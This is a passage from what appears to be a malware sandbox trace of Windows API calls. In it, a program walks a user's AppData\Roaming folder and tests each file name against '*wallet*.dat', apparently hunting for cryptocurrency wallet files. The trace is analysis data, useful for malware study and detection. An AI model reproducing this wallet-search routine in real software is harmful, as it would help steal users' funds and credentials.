param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\cEkdSu_e3sy.wav") returned 53 [0207.325] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0207.325] wsprintfA (in: param_1=0x19d1c8, param_2="%s" | out: param_1="cEkdSu_e3sy.wav") returned 15 [0207.325] PathMatchSpecA (pszFile="cEkdSu_e3sy.wav", pszSpec="*wallet*.dat") returned 0 [0207.325] wsprintfA (in: param_1=0x19cd90, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\cEkdSu_e3sy.wav\\*") returned 55 [0207.325] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\cEkdSu_e3sy.wav\\*", lpFindFileData=0x19cc48 | out: lpFindFileData=0x19cc48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf927f30, ftCreationTime.dwHighDateTime=0x1d79345, ftLastAccessTime.dwLowDateTime=0xf6da2ac0, ftLastAccessTime.dwHighDateTime=0x1d79426, ftLastWriteTime.dwLowDateTime=0xf6da2ac0, ftLastWriteTime.dwHighDateTime=0x1d79426, nFileSizeHigh=0x0, nFileSizeLow=0x2fee, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="c", cAlternateFileName="FLASÐ\x07\x02")) returned 0xffffffff [0207.325] FindNextFileA (in: hFindFile=0x5e7dc8, lpFindFileData=0x19d2d0 | out: lpFindFileData=0x19d2d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9189950, ftCreationTime.dwHighDateTime=0x1d79681, ftLastAccessTime.dwLowDateTime=0x2a40e2e0, ftLastAccessTime.dwHighDateTime=0x1d797b1, ftLastWriteTime.dwLowDateTime=0x2a40e2e0, ftLastWriteTime.dwHighDateTime=0x1d797b1, nFileSizeHigh=0x0, nFileSizeLow=0x9bbd, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="cFkmXqM0p2H6f5HdMl7z.jpg", cAlternateFileName="CFKMXQ~1.JPG")) returned 1 [0207.325] StrCmpCA (pszStr1="cFkmXqM0p2H6f5HdMl7z.jpg", pszStr2=".") returned 53 [0207.326] StrCmpCA (pszStr1="cFkmXqM0p2H6f5HdMl7z.jpg", pszStr2="..") returned 53 [0207.326] wsprintfA (in: param_1=0x19d0c0, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\cFkmXqM0p2H6f5HdMl7z.jpg") returned 62 [0207.326] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0207.326] wsprintfA (in: param_1=0x19d1c8, param_2="%s" | out: param_1="cFkmXqM0p2H6f5HdMl7z.jpg") returned 24 [0207.326] PathMatchSpecA (pszFile="cFkmXqM0p2H6f5HdMl7z.jpg", pszSpec="*wallet*.dat") returned 0 [0207.326] wsprintfA (in: param_1=0x19cd90, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\cFkmXqM0p2H6f5HdMl7z.jpg\\*") returned 64 [0207.326] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\cFkmXqM0p2H6f5HdMl7z.jpg\\*", lpFindFileData=0x19cc48 | out: lpFindFileData=0x19cc48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9189950, ftCreationTime.dwHighDateTime=0x1d79681, ftLastAccessTime.dwLowDateTime=0x2a40e2e0, ftLastAccessTime.dwHighDateTime=0x1d797b1, ftLastWriteTime.dwLowDateTime=0x2a40e2e0, ftLastWriteTime.dwHighDateTime=0x1d797b1, nFileSizeHigh=0x0, nFileSizeLow=0x9bbd, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="c", cAlternateFileName="FLASÐ\x07\x02")) returned 0xffffffff [0207.326] FindNextFileA (in: hFindFile=0x5e7dc8, lpFindFileData=0x19d2d0 | out: lpFindFileData=0x19d2d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26e82950, ftCreationTime.dwHighDateTime=0x1d7900e, ftLastAccessTime.dwLowDateTime=0x5b7bb260, ftLastAccessTime.dwHighDateTime=0x1d7937c, ftLastWriteTime.dwLowDateTime=0x5b7bb260, ftLastWriteTime.dwHighDateTime=0x1d7937c, nFileSizeHigh=0x0, nFileSizeLow=0x11163, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="DwMJ.gif", cAlternateFileName="")) returned 1 [0207.326] StrCmpCA (pszStr1="DwMJ.gif", pszStr2=".") returned 22 [0207.326] StrCmpCA (pszStr1="DwMJ.gif", pszStr2="..") returned 22 [0207.326] wsprintfA (in: param_1=0x19d0c0, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\DwMJ.gif") returned 46 [0207.326] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0207.326] wsprintfA (in: param_1=0x19d1c8, param_2="%s" | out: param_1="DwMJ.gif") returned 8 [0207.326] PathMatchSpecA (pszFile="DwMJ.gif", pszSpec="*wallet*.dat") returned 0 [0207.326] wsprintfA (in: param_1=0x19cd90, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\DwMJ.gif\\*") returned 48 [0207.326] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\DwMJ.gif\\*", lpFindFileData=0x19cc48 | out: lpFindFileData=0x19cc48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26e82950, ftCreationTime.dwHighDateTime=0x1d7900e, ftLastAccessTime.dwLowDateTime=0x5b7bb260, ftLastAccessTime.dwHighDateTime=0x1d7937c, ftLastWriteTime.dwLowDateTime=0x5b7bb260, ftLastWriteTime.dwHighDateTime=0x1d7937c, nFileSizeHigh=0x0, nFileSizeLow=0x11163, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="D", cAlternateFileName="FLASÐ\x07\x02")) returned 0xffffffff [0207.326] FindNextFileA (in: hFindFile=0x5e7dc8, lpFindFileData=0x19d2d0 | out: lpFindFileData=0x19d2d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x947b82e0, ftCreationTime.dwHighDateTime=0x1d79500, ftLastAccessTime.dwLowDateTime=0x1285d850, ftLastAccessTime.dwHighDateTime=0x1d79684, ftLastWriteTime.dwLowDateTime=0x1285d850, ftLastWriteTime.dwHighDateTime=0x1d79684, nFileSizeHigh=0x0, nFileSizeLow=0x14273, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="e3o1sDs4IQ_83ZcyQO.flv", cAlternateFileName="E3O1SD~1.FLV")) returned 1 [0207.326] StrCmpCA (pszStr1="e3o1sDs4IQ_83ZcyQO.flv", pszStr2=".") returned 55 [0207.326] StrCmpCA (pszStr1="e3o1sDs4IQ_83ZcyQO.flv", pszStr2="..") returned 55 [0207.326] wsprintfA (in: param_1=0x19d0c0, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\e3o1sDs4IQ_83ZcyQO.flv") returned 60 [0207.326] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0207.326] wsprintfA (in: param_1=0x19d1c8, param_2="%s" | out: param_1="e3o1sDs4IQ_83ZcyQO.flv") returned 22 [0207.327] PathMatchSpecA (pszFile="e3o1sDs4IQ_83ZcyQO.flv", pszSpec="*wallet*.dat") returned 0 [0207.327] wsprintfA (in: param_1=0x19cd90, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\e3o1sDs4IQ_83ZcyQO.flv\\*") returned 62 [0207.327] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\e3o1sDs4IQ_83ZcyQO.flv\\*", lpFindFileData=0x19cc48 | out: lpFindFileData=0x19cc48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x947b82e0, ftCreationTime.dwHighDateTime=0x1d79500, ftLastAccessTime.dwLowDateTime=0x1285d850, ftLastAccessTime.dwHighDateTime=0x1d79684, ftLastWriteTime.dwLowDateTime=0x1285d850, ftLastWriteTime.dwHighDateTime=0x1d79684, nFileSizeHigh=0x0, nFileSizeLow=0x14273, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="e", cAlternateFileName="FLASÐ\x07\x02")) returned 0xffffffff [0207.327] FindNextFileA (in: hFindFile=0x5e7dc8, lpFindFileData=0x19d2d0 | out: lpFindFileData=0x19d2d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8727ac00, ftCreationTime.dwHighDateTime=0x1d78834, ftLastAccessTime.dwLowDateTime=0xf8fd4ba0, ftLastAccessTime.dwHighDateTime=0x1d7891f, ftLastWriteTime.dwLowDateTime=0xf8fd4ba0, ftLastWriteTime.dwHighDateTime=0x1d7891f, nFileSizeHigh=0x0, nFileSizeLow=0x5e6c, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="eMi1uPHL3O_.ppt", cAlternateFileName="EMI1UP~1.PPT")) returned 1 [0207.327] StrCmpCA (pszStr1="eMi1uPHL3O_.ppt", pszStr2=".") returned 55 [0207.327] StrCmpCA (pszStr1="eMi1uPHL3O_.ppt", pszStr2="..") returned 55 [0207.327] wsprintfA (in: param_1=0x19d0c0, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\eMi1uPHL3O_.ppt") returned 53 [0207.327] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0207.327] wsprintfA (in: param_1=0x19d1c8, param_2="%s" | out: param_1="eMi1uPHL3O_.ppt") returned 15 [0207.327] PathMatchSpecA (pszFile="eMi1uPHL3O_.ppt", pszSpec="*wallet*.dat") returned 0 [0207.327] wsprintfA (in: param_1=0x19cd90, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\eMi1uPHL3O_.ppt\\*") returned 55 [0207.327] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\eMi1uPHL3O_.ppt\\*", lpFindFileData=0x19cc48 | out: lpFindFileData=0x19cc48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8727ac00, ftCreationTime.dwHighDateTime=0x1d78834, ftLastAccessTime.dwLowDateTime=0xf8fd4ba0, ftLastAccessTime.dwHighDateTime=0x1d7891f, ftLastWriteTime.dwLowDateTime=0xf8fd4ba0, ftLastWriteTime.dwHighDateTime=0x1d7891f, nFileSizeHigh=0x0, nFileSizeLow=0x5e6c, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="e", cAlternateFileName="FLASÐ\x07\x02")) returned 0xffffffff [0207.327] FindNextFileA (in: hFindFile=0x5e7dc8, lpFindFileData=0x19d2d0 | out: lpFindFileData=0x19d2d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aab50, ftCreationTime.dwHighDateTime=0x1d78a8f, ftLastAccessTime.dwLowDateTime=0x1acb3200, ftLastAccessTime.dwHighDateTime=0x1d790ba, ftLastWriteTime.dwLowDateTime=0x1acb3200, ftLastWriteTime.dwHighDateTime=0x1d790ba, nFileSizeHigh=0x0, nFileSizeLow=0x13d2b, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="g3MZGJe.pptx", cAlternateFileName="G3MZGJ~1.PPT")) returned 1 [0207.327] StrCmpCA (pszStr1="g3MZGJe.pptx", pszStr2=".") returned 57 [0207.327] StrCmpCA (pszStr1="g3MZGJe.pptx", pszStr2="..") returned 57 [0207.327] wsprintfA (in: param_1=0x19d0c0, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\g3MZGJe.pptx") returned 50 [0207.327] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0207.327] wsprintfA (in: param_1=0x19d1c8, param_2="%s" | out: param_1="g3MZGJe.pptx") returned 12 [0207.327] PathMatchSpecA (pszFile="g3MZGJe.pptx", pszSpec="*wallet*.dat") returned 0 [0207.327] wsprintfA (in: param_1=0x19cd90, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\g3MZGJe.pptx\\*") returned 52 [0207.327] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\g3MZGJe.pptx\\*", lpFindFileData=0x19cc48 | out: lpFindFileData=0x19cc48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aab50, ftCreationTime.dwHighDateTime=0x1d78a8f, ftLastAccessTime.dwLowDateTime=0x1acb3200, ftLastAccessTime.dwHighDateTime=0x1d790ba, ftLastWriteTime.dwLowDateTime=0x1acb3200, ftLastWriteTime.dwHighDateTime=0x1d790ba, nFileSizeHigh=0x0, nFileSizeLow=0x13d2b, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="g", cAlternateFileName="FLASÐ\x07\x02")) returned 0xffffffff [0207.328] FindNextFileA (in: hFindFile=0x5e7dc8, lpFindFileData=0x19d2d0 | out: lpFindFileData=0x19d2d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b9531a0, ftCreationTime.dwHighDateTime=0x1d79834, ftLastAccessTime.dwLowDateTime=0x41797cd0, ftLastAccessTime.dwHighDateTime=0x1d79877, ftLastWriteTime.dwLowDateTime=0x41797cd0, ftLastWriteTime.dwHighDateTime=0x1d79877, nFileSizeHigh=0x0, nFileSizeLow=0x1136b, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="gQChS0ReVtnoQ4-Tr9.jpg", cAlternateFileName="GQCHS0~1.JPG")) returned 1 [0207.328] StrCmpCA (pszStr1="gQChS0ReVtnoQ4-Tr9.jpg", pszStr2=".") returned 57 [0207.328] StrCmpCA (pszStr1="gQChS0ReVtnoQ4-Tr9.jpg", pszStr2="..") returned 57 [0207.328] wsprintfA (in: param_1=0x19d0c0, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\gQChS0ReVtnoQ4-Tr9.jpg") returned 60 [0207.328] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0207.328] wsprintfA (in: param_1=0x19d1c8, param_2="%s" | out: param_1="gQChS0ReVtnoQ4-Tr9.jpg") returned 22 [0207.328] PathMatchSpecA (pszFile="gQChS0ReVtnoQ4-Tr9.jpg", pszSpec="*wallet*.dat") returned 0 [0207.328] wsprintfA (in: param_1=0x19cd90, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\gQChS0ReVtnoQ4-Tr9.jpg\\*") returned 62 [0207.328] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\gQChS0ReVtnoQ4-Tr9.jpg\\*", lpFindFileData=0x19cc48 | out: lpFindFileData=0x19cc48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b9531a0, ftCreationTime.dwHighDateTime=0x1d79834, ftLastAccessTime.dwLowDateTime=0x41797cd0, ftLastAccessTime.dwHighDateTime=0x1d79877, ftLastWriteTime.dwLowDateTime=0x41797cd0, ftLastWriteTime.dwHighDateTime=0x1d79877, nFileSizeHigh=0x0, nFileSizeLow=0x1136b, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="g", cAlternateFileName="FLASÐ\x07\x02")) returned 0xffffffff [0207.328] FindNextFileA (in: hFindFile=0x5e7dc8, lpFindFileData=0x19d2d0 | out: lpFindFileData=0x19d2d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeccf9180, ftCreationTime.dwHighDateTime=0x1d78b36, ftLastAccessTime.dwLowDateTime=0x5d794a20, ftLastAccessTime.dwHighDateTime=0x1d7967c, ftLastWriteTime.dwLowDateTime=0x5d794a20, ftLastWriteTime.dwHighDateTime=0x1d7967c, nFileSizeHigh=0x0, nFileSizeLow=0xdd72, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="HJLU0f3yiDCncX7eHleY.mp4", cAlternateFileName="HJLU0F~1.MP4")) returned 1 [0207.328] StrCmpCA (pszStr1="HJLU0f3yiDCncX7eHleY.mp4", pszStr2=".") returned 26 [0207.328] StrCmpCA (pszStr1="HJLU0f3yiDCncX7eHleY.mp4", pszStr2="..") returned 26 [0207.328] wsprintfA (in: param_1=0x19d0c0, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\HJLU0f3yiDCncX7eHleY.mp4") returned 62 [0207.368] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0207.368] wsprintfA (in: param_1=0x19d1c8, param_2="%s" | out: param_1="HJLU0f3yiDCncX7eHleY.mp4") returned 24 [0207.368] PathMatchSpecA (pszFile="HJLU0f3yiDCncX7eHleY.mp4", pszSpec="*wallet*.dat") returned 0 [0207.368] wsprintfA (in: param_1=0x19cd90, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\HJLU0f3yiDCncX7eHleY.mp4\\*") returned 64 [0207.368] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\HJLU0f3yiDCncX7eHleY.mp4\\*", lpFindFileData=0x19cc48 | out: lpFindFileData=0x19cc48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeccf9180, ftCreationTime.dwHighDateTime=0x1d78b36, ftLastAccessTime.dwLowDateTime=0x5d794a20, ftLastAccessTime.dwHighDateTime=0x1d7967c, ftLastWriteTime.dwLowDateTime=0x5d794a20, ftLastWriteTime.dwHighDateTime=0x1d7967c, nFileSizeHigh=0x0, nFileSizeLow=0xdd72, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="H", cAlternateFileName="FLASÐ\x07\x02")) returned 0xffffffff [0207.368] FindNextFileA (in: hFindFile=0x5e7dc8, lpFindFileData=0x19d2d0 | out: lpFindFileData=0x19d2d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d6cf520, ftCreationTime.dwHighDateTime=0x1d78eb4, ftLastAccessTime.dwLowDateTime=0xa76ddb50, ftLastAccessTime.dwHighDateTime=0x1d7953c, ftLastWriteTime.dwLowDateTime=0xa76ddb50, ftLastWriteTime.dwHighDateTime=0x1d7953c, nFileSizeHigh=0x0, nFileSizeLow=0x10f8a, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="ihtv_3JERpPF8lX4a Bk.bmp", cAlternateFileName="IHTV_3~1.BMP")) returned 1 [0207.368] StrCmpCA (pszStr1="ihtv_3JERpPF8lX4a Bk.bmp", pszStr2=".") returned 59 [0207.368] StrCmpCA (pszStr1="ihtv_3JERpPF8lX4a Bk.bmp", pszStr2="..") returned 59 [0207.369] wsprintfA (in: param_1=0x19d0c0, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ihtv_3JERpPF8lX4a Bk.bmp") returned 62 [0207.369] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0207.369] wsprintfA (in: param_1=0x19d1c8, param_2="%s" | out: param_1="ihtv_3JERpPF8lX4a Bk.bmp") returned 24 [0207.369] PathMatchSpecA (pszFile="ihtv_3JERpPF8lX4a Bk.bmp", pszSpec="*wallet*.dat") returned 0 [0207.369] wsprintfA (in: param_1=0x19cd90, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ihtv_3JERpPF8lX4a Bk.bmp\\*") returned 64 [0207.369] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ihtv_3JERpPF8lX4a Bk.bmp\\*", lpFindFileData=0x19cc48 | out: lpFindFileData=0x19cc48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d6cf520, ftCreationTime.dwHighDateTime=0x1d78eb4, ftLastAccessTime.dwLowDateTime=0xa76ddb50, ftLastAccessTime.dwHighDateTime=0x1d7953c, ftLastWriteTime.dwLowDateTime=0xa76ddb50, ftLastWriteTime.dwHighDateTime=0x1d7953c, nFileSizeHigh=0x0, nFileSizeLow=0x10f8a, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="i", cAlternateFileName="FLASÐ\x07\x02")) returned 0xffffffff [0207.369] FindNextFileA (in: hFindFile=0x5e7dc8, lpFindFileData=0x19d2d0 | out: lpFindFileData=0x19d2d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabf398e0, ftCreationTime.dwHighDateTime=0x1d794ec, ftLastAccessTime.dwLowDateTime=0x41572e50, ftLastAccessTime.dwHighDateTime=0x1d798a4, ftLastWriteTime.dwLowDateTime=0x41572e50, ftLastWriteTime.dwHighDateTime=0x1d798a4, nFileSizeHigh=0x0, nFileSizeLow=0x825e, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="kIkQC3jqsysSx-pP5.jpg", cAlternateFileName="KIKQC3~1.JPG")) returned 1 [0207.369] StrCmpCA (pszStr1="kIkQC3jqsysSx-pP5.jpg", pszStr2=".") returned 61 [0207.369] StrCmpCA (pszStr1="kIkQC3jqsysSx-pP5.jpg", pszStr2="..") returned 61 [0207.369] wsprintfA (in: param_1=0x19d0c0, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\kIkQC3jqsysSx-pP5.jpg") returned 59 [0207.369] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0207.369] wsprintfA (in: param_1=0x19d1c8, param_2="%s" | out: param_1="kIkQC3jqsysSx-pP5.jpg") returned 21 [0207.369] PathMatchSpecA (pszFile="kIkQC3jqsysSx-pP5.jpg", pszSpec="*wallet*.dat") returned 0 [0207.369] wsprintfA (in: param_1=0x19cd90, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\kIkQC3jqsysSx-pP5.jpg\\*") returned 61 [0207.369] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\kIkQC3jqsysSx-pP5.jpg\\*", lpFindFileData=0x19cc48 | out: lpFindFileData=0x19cc48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabf398e0, ftCreationTime.dwHighDateTime=0x1d794ec, ftLastAccessTime.dwLowDateTime=0x41572e50, ftLastAccessTime.dwHighDateTime=0x1d798a4, ftLastWriteTime.dwLowDateTime=0x41572e50, ftLastWriteTime.dwHighDateTime=0x1d798a4, nFileSizeHigh=0x0, nFileSizeLow=0x825e, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="k", cAlternateFileName="FLASÐ\x07\x02")) returned 0xffffffff [0207.369] FindNextFileA (in: hFindFile=0x5e7dc8, lpFindFileData=0x19d2d0 | out: lpFindFileData=0x19d2d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb59944f0, ftCreationTime.dwHighDateTime=0x1d7934b, ftLastAccessTime.dwLowDateTime=0x490036f0, ftLastAccessTime.dwHighDateTime=0x1d796ca, ftLastWriteTime.dwLowDateTime=0x490036f0, ftLastWriteTime.dwHighDateTime=0x1d796ca, nFileSizeHigh=0x0, nFileSizeLow=0x6416, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="l0d.jpg", cAlternateFileName="")) returned 1 [0207.369] StrCmpCA (pszStr1="l0d.jpg", pszStr2=".") returned 62 [0207.369] StrCmpCA (pszStr1="l0d.jpg", pszStr2="..") returned 62 [0207.369] wsprintfA (in: param_1=0x19d0c0, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\l0d.jpg") returned 45 [0207.370] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0207.370] wsprintfA (in: param_1=0x19d1c8, param_2="%s" | out: param_1="l0d.jpg") returned 7 [0207.370] PathMatchSpecA (pszFile="l0d.jpg", pszSpec="*wallet*.dat") returned 0 [0207.370] wsprintfA (in: param_1=0x19cd90, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\l0d.jpg\\*") returned 47 [0207.370] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\l0d.jpg\\*", lpFindFileData=0x19cc48 | out: lpFindFileData=0x19cc48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb59944f0, ftCreationTime.dwHighDateTime=0x1d7934b, ftLastAccessTime.dwLowDateTime=0x490036f0, ftLastAccessTime.dwHighDateTime=0x1d796ca, ftLastWriteTime.dwLowDateTime=0x490036f0, ftLastWriteTime.dwHighDateTime=0x1d796ca, nFileSizeHigh=0x0, nFileSizeLow=0x6416, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="l", cAlternateFileName="FLASÐ\x07\x02")) returned 0xffffffff [0207.370] FindNextFileA (in: hFindFile=0x5e7dc8, lpFindFileData=0x19d2d0 | out: lpFindFileData=0x19d2d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x924cb760, ftCreationTime.dwHighDateTime=0x1d79581, ftLastAccessTime.dwLowDateTime=0xd1c70920, ftLastAccessTime.dwHighDateTime=0x1d7977c, ftLastWriteTime.dwLowDateTime=0xd1c70920, ftLastWriteTime.dwHighDateTime=0x1d7977c, nFileSizeHigh=0x0, nFileSizeLow=0x8930, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="m5h2OHX6-_EYg.m4a", cAlternateFileName="M5H2OH~1.M4A")) returned 1 [0207.370] StrCmpCA (pszStr1="m5h2OHX6-_EYg.m4a", pszStr2=".") returned 63 [0207.370] StrCmpCA (pszStr1="m5h2OHX6-_EYg.m4a", pszStr2="..") returned 63 [0207.370] wsprintfA (in: param_1=0x19d0c0, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\m5h2OHX6-_EYg.m4a") returned 55 [0207.370] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0207.370] wsprintfA (in: param_1=0x19d1c8, param_2="%s" | out: param_1="m5h2OHX6-_EYg.m4a") returned 17 [0207.370] PathMatchSpecA (pszFile="m5h2OHX6-_EYg.m4a", pszSpec="*wallet*.dat") returned 0 [0207.370] wsprintfA (in: param_1=0x19cd90, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\m5h2OHX6-_EYg.m4a\\*") returned 57 [0207.370] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\m5h2OHX6-_EYg.m4a\\*", lpFindFileData=0x19cc48 | out: lpFindFileData=0x19cc48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x924cb760, ftCreationTime.dwHighDateTime=0x1d79581, ftLastAccessTime.dwLowDateTime=0xd1c70920, ftLastAccessTime.dwHighDateTime=0x1d7977c, ftLastWriteTime.dwLowDateTime=0xd1c70920, ftLastWriteTime.dwHighDateTime=0x1d7977c, nFileSizeHigh=0x0, nFileSizeLow=0x8930, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="m", cAlternateFileName="FLASÐ\x07\x02")) returned 0xffffffff [0207.371] FindNextFileA (in: hFindFile=0x5e7dc8, lpFindFileData=0x19d2d0 | out: lpFindFileData=0x19d2d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe63c2500, ftCreationTime.dwHighDateTime=0x1d790e9, ftLastAccessTime.dwLowDateTime=0x9d7cc110, ftLastAccessTime.dwHighDateTime=0x1d7917c, ftLastWriteTime.dwLowDateTime=0x9d7cc110, ftLastWriteTime.dwHighDateTime=0x1d7917c, nFileSizeHigh=0x0, nFileSizeLow=0xb760, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Mfk-EUjZ.jpg", cAlternateFileName="")) returned 1 [0207.371] StrCmpCA (pszStr1="Mfk-EUjZ.jpg", pszStr2=".") returned 31 [0207.371] StrCmpCA (pszStr1="Mfk-EUjZ.jpg", pszStr2="..") returned 31 [0207.371] wsprintfA (in: param_1=0x19d0c0, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mfk-EUjZ.jpg") returned 50 [0207.371] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0207.371] wsprintfA (in: param_1=0x19d1c8, param_2="%s" | out: param_1="Mfk-EUjZ.jpg") returned 12 [0207.371] PathMatchSpecA (pszFile="Mfk-EUjZ.jpg", pszSpec="*wallet*.dat") returned 0 [0207.371] wsprintfA (in: param_1=0x19cd90, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mfk-EUjZ.jpg\\*") returned 52 [0207.371] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mfk-EUjZ.jpg\\*", lpFindFileData=0x19cc48 | out: lpFindFileData=0x19cc48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe63c2500, ftCreationTime.dwHighDateTime=0x1d790e9, ftLastAccessTime.dwLowDateTime=0x9d7cc110, ftLastAccessTime.dwHighDateTime=0x1d7917c, ftLastWriteTime.dwLowDateTime=0x9d7cc110, ftLastWriteTime.dwHighDateTime=0x1d7917c, nFileSizeHigh=0x0, nFileSizeLow=0xb760, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="M", cAlternateFileName="FLASÐ\x07\x02")) returned 0xffffffff [0207.371] FindNextFileA (in: hFindFile=0x5e7dc8, lpFindFileData=0x19d2d0 | out: lpFindFileData=0x19d2d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xa92f1c4e, 